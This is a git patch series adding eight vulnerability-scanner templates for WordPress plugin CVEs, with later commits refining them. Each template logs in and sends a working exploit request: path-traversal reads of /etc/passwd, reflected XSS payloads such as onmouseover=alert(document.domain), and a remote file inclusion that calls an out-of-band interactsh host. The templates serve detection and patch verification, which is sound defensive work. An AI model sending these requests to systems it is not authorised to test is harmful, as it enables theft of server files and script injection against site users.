From f29d2b20df653cb4eed8a99cb12a5e73fc7dc3cf Mon Sep 17 00:00:00 2001
From: cckuailong <346813862@qq.com>
Date: Tue, 8 Feb 2022 09:07:19 +0800
Subject: [PATCH 01/11] add some wp plugins cves
---
cves/2020/CVE-2020-35749.yaml | 42 ++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24300.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24488.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24926.yaml | 43 +++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24947.yaml | 40 +++++++++++++++++++++++++++++++
cves/2021/CVE-2021-24991.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-25008.yaml | 45 +++++++++++++++++++++++++++++++++++
cves/2021/CVE-2021-25052.yaml | 42 ++++++++++++++++++++++++++++++++
8 files changed, 347 insertions(+)
create mode 100644 cves/2020/CVE-2020-35749.yaml
create mode 100644 cves/2021/CVE-2021-24300.yaml
create mode 100644 cves/2021/CVE-2021-24488.yaml
create mode 100644 cves/2021/CVE-2021-24926.yaml
create mode 100644 cves/2021/CVE-2021-24947.yaml
create mode 100644 cves/2021/CVE-2021-24991.yaml
create mode 100644 cves/2021/CVE-2021-25008.yaml
create mode 100644 cves/2021/CVE-2021-25052.yaml
diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml
new file mode 100644
index 0000000000..32ba707b50
--- /dev/null
+++ b/cves/2020/CVE-2020-35749.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-35749
+
+info:
+ name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
+ author: cckuailong
+ severity: high
+ description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
+ reference:
+ - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35749
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 7.7
+ cve-id: CVE-2020-35749
+ cwe-id: CWE-22
+ tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24300.yaml b/cves/2021/CVE-2021-24300.yaml
new file mode 100644
index 0000000000..5813a472a8
--- /dev/null
+++ b/cves/2021/CVE-2021-24300.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24300
+
+info:
+ name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24300
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "onmouseover=alert(1)"
+ - "PickPlugins Product Slider"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
new file mode 100644
index 0000000000..b3034c8c49
--- /dev/null
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24488
+
+info:
+ name: WordPress Plugin Post Grid < 2.1.8 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+ reference:
+ - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24488
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="> HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ">"
+ - "Post Grid Settings"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24926.yaml b/cves/2021/CVE-2021-24926.yaml
new file mode 100644
index 0000000000..2fe9af8eff
--- /dev/null
+++ b/cves/2021/CVE-2021-24926.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-24926
+
+info:
+ name: WordPress Plugin Domain Check < 1.0.17 - XSS
+ author: cckuailong
+ severity: medium
+ description: The Domain Check WordPress plugin before 1.0.17 does not sanitise and escape the domain parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24926
+ classification:
+ cve-id: CVE-2021-24926
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Domain Check"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
new file mode 100644
index 0000000000..ed2f2b4aa2
--- /dev/null
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-24947
+
+info:
+ name: RVM - Responsive Vector Maps < 6.4.2 - Arbitrary File Read
+ author: cckuailong
+ severity: high
+ description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24947
+ classification:
+ cve-id: CVE-2021-24947
+ cwe-id: CWE-23
+ tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
new file mode 100644
index 0000000000..e4634309d9
--- /dev/null
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-24991
+
+info:
+ name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS
+ author: cckuailong
+ severity: medium
+ description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24991
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2021-24991
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "WooCommerce PDF Invoices"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-25008.yaml b/cves/2021/CVE-2021-25008.yaml
new file mode 100644
index 0000000000..43d30f94d5
--- /dev/null
+++ b/cves/2021/CVE-2021-25008.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-25008
+
+info:
+ name: The Code Snippets WordPress plugin < 2.14.3 - XSS
+ author: cckuailong
+ severity: medium
+ description: The Code Snippets WordPress plugin before 2.14.3 does not escape the snippets-safe-mode parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issue.
+ reference:
+ - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25008
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25008
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "Snippets"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-25052.yaml b/cves/2021/CVE-2021-25052.yaml
new file mode 100644
index 0000000000..bea1788a4d
--- /dev/null
+++ b/cves/2021/CVE-2021-25052.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-25052
+
+info:
+ name: he Button Generator WordPress plugin < 2.3.3 - RFI
+ author: cckuailong
+ severity: high
+ description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
+ reference:
+ - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25052
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-25052
+ cwe-id: CWE-352
+ tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
\ No newline at end of file
From 8664885b453cd67986f26989f9995427d1cffb1a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:13:40 +0530
Subject: [PATCH 02/11] Update CVE-2020-35749.yaml
---
cves/2020/CVE-2020-35749.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/cves/2020/CVE-2020-35749.yaml b/cves/2020/CVE-2020-35749.yaml
index 32ba707b50..94c2be7907 100644
--- a/cves/2020/CVE-2020-35749.yaml
+++ b/cves/2020/CVE-2020-35749.yaml
@@ -13,7 +13,7 @@ info:
cvss-score: 7.7
cve-id: CVE-2020-35749
cwe-id: CWE-22
- tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated
+ tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
@@ -25,11 +25,9 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
-
cookie-reuse: true
matchers-condition: and
matchers:
@@ -39,4 +37,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 1dc5ff098ada37a4172d3032a9b246d4fb0fc38e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:19:44 +0530
Subject: [PATCH 03/11] Update CVE-2021-24300.yaml
---
cves/2021/CVE-2021-24300.yaml | 12 ++++++++----
1 file changed, 8 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24300.yaml b/cves/2021/CVE-2021-24300.yaml
index 5813a472a8..33ab74ea05 100644
--- a/cves/2021/CVE-2021-24300.yaml
+++ b/cves/2021/CVE-2021-24300.yaml
@@ -25,9 +25,8 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
- GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%281%29%3B%2F%2F HTTP/1.1
+ GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +35,15 @@ requests:
- type: word
part: body
words:
- - "onmouseover=alert(1)"
+ - 'value="\"onmouseover=alert(document.domain);//">'
- "PickPlugins Product Slider"
condition: and
+ - type: word
+ part: header
+ words:
+ - text/html
+
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From a167a69be6709beac5ff90b2c26247130e5d0f9e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:32:39 +0530
Subject: [PATCH 04/11] Update CVE-2021-24488.yaml
---
cves/2021/CVE-2021-24488.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
index b3034c8c49..b0ac04b7da 100644
--- a/cves/2021/CVE-2021-24488.yaml
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -27,7 +27,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="> HTTP/1.1
+ GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +36,10 @@ requests:
- type: word
part: body
words:
- - ">"
- - "Post Grid Settings"
+ - 'value="\"onmouseover=alert(document.domain)/">'
+ - 'Post Grid'
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 2d3240a98f7cc3e282e10c0ac0e30534905d0a29 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:36:16 +0530
Subject: [PATCH 05/11] Update CVE-2021-24926.yaml
---
cves/2021/CVE-2021-24926.yaml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-24926.yaml b/cves/2021/CVE-2021-24926.yaml
index 2fe9af8eff..7a8c1e8d7d 100644
--- a/cves/2021/CVE-2021-24926.yaml
+++ b/cves/2021/CVE-2021-24926.yaml
@@ -25,7 +25,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo HTTP/1.1
+ GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -34,10 +34,10 @@ requests:
- type: word
part: body
words:
- - ""
+ - ""
- "Domain Check"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 81a4316d2e9bf5b54edfbf654d88680162d7663a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:38:33 +0530
Subject: [PATCH 06/11] Update CVE-2021-24947.yaml
---
cves/2021/CVE-2021-24947.yaml | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
index ed2f2b4aa2..30f3484f54 100644
--- a/cves/2021/CVE-2021-24947.yaml
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -11,7 +11,7 @@ info:
classification:
cve-id: CVE-2021-24947
cwe-id: CWE-23
- tags: cve,cve2021,arbitrary-file-read,wp,wordpress,wp-plugin,authenticated
+ tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,authenticated,lfr
requests:
- raw:
@@ -23,7 +23,6 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1
Host: {{Hostname}}
@@ -37,4 +36,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 4fea6b14f49ff7067cede5ed8c9a369c8823f8e1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:42:32 +0530
Subject: [PATCH 07/11] Update CVE-2021-24991.yaml
---
cves/2021/CVE-2021-24991.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml
index e4634309d9..8be68cf940 100644
--- a/cves/2021/CVE-2021-24991.yaml
+++ b/cves/2021/CVE-2021-24991.yaml
@@ -6,7 +6,7 @@ info:
severity: medium
description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard.
reference:
- - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9
- https://nvd.nist.gov/vuln/detail/CVE-2021-24991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
@@ -27,7 +27,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
- GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +36,10 @@ requests:
- type: word
part: body
words:
- - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
- "WooCommerce PDF Invoices"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From 4fe9243d9d08ce67dc5386dced2a28fc9e7a4d69 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:49:53 +0530
Subject: [PATCH 08/11] Update CVE-2021-25008.yaml
---
cves/2021/CVE-2021-25008.yaml | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git a/cves/2021/CVE-2021-25008.yaml b/cves/2021/CVE-2021-25008.yaml
index 43d30f94d5..7abdca8bd9 100644
--- a/cves/2021/CVE-2021-25008.yaml
+++ b/cves/2021/CVE-2021-25008.yaml
@@ -25,9 +25,8 @@ requests:
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
-
- |
- GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1
+ GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -36,10 +35,10 @@ requests:
- type: word
part: body
words:
- - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x"
+ - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x"
- "Snippets"
condition: and
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
From b64401ab0263dc3a50b6a47bb27401b2c7b249f9 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:53:44 +0530
Subject: [PATCH 09/11] Update CVE-2021-25052.yaml
---
cves/2021/CVE-2021-25052.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-25052.yaml b/cves/2021/CVE-2021-25052.yaml
index bea1788a4d..f83fa69d8f 100644
--- a/cves/2021/CVE-2021-25052.yaml
+++ b/cves/2021/CVE-2021-25052.yaml
@@ -1,7 +1,7 @@
id: CVE-2021-25052
info:
- name: he Button Generator WordPress plugin < 2.3.3 - RFI
+ name: The Button Generator WordPress plugin < 2.3.3 - RFI
author: cckuailong
severity: high
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
@@ -36,7 +36,9 @@ requests:
- type: status
status:
- 200
+
- type: word
part: interactsh_protocol
+ name: http
words:
- - "dns"
\ No newline at end of file
+ - "http"
From ce903c73f2a922b343f77f4c0f9832448e8dd7dc Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:55:00 +0530
Subject: [PATCH 10/11] Update CVE-2021-24947.yaml
---
cves/2021/CVE-2021-24947.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-24947.yaml b/cves/2021/CVE-2021-24947.yaml
index 30f3484f54..248db03bae 100644
--- a/cves/2021/CVE-2021-24947.yaml
+++ b/cves/2021/CVE-2021-24947.yaml
@@ -6,7 +6,7 @@ info:
severity: high
description: The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server.
reference:
- - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a
+ - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18
- https://nvd.nist.gov/vuln/detail/CVE-2021-24947
classification:
cve-id: CVE-2021-24947
From ba7c71e08165359ebcb1a89c332e402ba611d46f Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Wed, 9 Feb 2022 00:57:33 +0530
Subject: [PATCH 11/11] Update CVE-2021-24488.yaml
---
cves/2021/CVE-2021-24488.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
index b0ac04b7da..227a6f412a 100644
--- a/cves/2021/CVE-2021-24488.yaml
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -42,4 +42,4 @@ requests:
- type: status
status:
- - 200
+ - 200